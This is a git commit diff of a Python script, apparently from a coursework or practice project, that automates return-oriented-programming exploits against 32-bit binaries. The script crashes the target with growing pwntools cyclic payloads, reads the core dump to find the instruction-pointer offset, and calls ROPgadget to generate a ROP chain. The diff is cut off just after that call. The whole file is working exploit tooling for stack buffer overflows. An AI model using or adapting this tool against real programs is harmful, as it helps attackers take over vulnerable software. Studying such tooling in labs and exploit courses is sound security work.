Cat, argparse, payload sizes, more graceful errors

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
Liam Dalgarno 2020-11-25 16:17:36 +00:00
parent 5f8099dde0
commit 99cb451194

View File

@ -1,41 +1,69 @@
from pwnlib.elf.corefile import Coredump from pwnlib.elf.corefile import Coredump
from pwnlib.util.cyclic import cyclic, cyclic_find from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack from pwnlib.util.packing import pack
from pwnlib.tubes.process import process from pwnlib.tubes.process import process, signal
import os import os
import subprocess import subprocess
import argparse
import warnings
import ROPgadget.ropgadget
exec_name = "./vuln-32" print(r'''
_ ___ _.--. ___ _____ ______ _____ ______ ______
\`.|\..----...-'` `-._.-'_.-'` / _ \ / ____| /\ |____ / ____| /\ | ____| ____|
/ ' ` , __.--' | | | |_ _| | / \ / / | / \ | |__ | |__
)/' _/ \ `-_, / | | | \ \/ / | / /\ \ / /| | / /\ \ | __| | __|
`-'" `"\_ ,_.-;_.-\_ ', | |_| |> <| |____ / ____ \ / / | |____ / ____ \| | | |____
_.-'_./ {_.' ; / \___//_/\_\\_____/_/ \_\/_/ \_____/_/ \_\_| |______|
{_.-``-' {_/
''')
def find_offset(exec_name): arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
# TODO: command line arguments arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("--core", "--c", metavar="core_file", type=str, help="The name of the generated core file")
args = arg_parser.parse_args()
exec_file = args.exec_file
core_file = args.core
def find_offset(exec_file, core_file):
input_file = "input.txt" input_file = "input.txt"
core_file = "./core"
try:
os.remove(core_file) os.remove(core_file)
except:
pass
payload_size = 32
while payload_size <= 16384:
print(f"[🤔] Trying payload {payload_size}...")
# TODO Loop until a crash, increase payload size each iteration
with open(input_file, "wb") as f: with open(input_file, "wb") as f:
payload = cyclic(512) payload = cyclic(payload_size)
f.write(payload) f.write(payload)
process([exec_name, input_file]).wait() process([f"./{exec_file}", input_file]).wait()
core = Coredump('./core') try:
core = Coredump(f"./{core_file}")
assert pack(core.eip) in payload if core and pack(core.eip) in payload:
offset = cyclic_find(core.eip)
print(f"[😳] Found offset at {offset}!")
return offset
except FileNotFoundError:
pass
os.remove(input_file) os.remove(input_file)
payload_size *= 2
return cyclic_find(core.eip) raise BaseException("Failed to find offset")
offset = find_offset(exec_name)
# print("\t# Padding goes here") <-- search for this offset = find_offset(exec_file, core_file)
# print("\tp = ''\n")
result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE) result = subprocess.run(["ROPgadget", "--binary", exec_file, "--ropchain"], stdout=subprocess.PIPE)
stdout = result.stdout stdout = result.stdout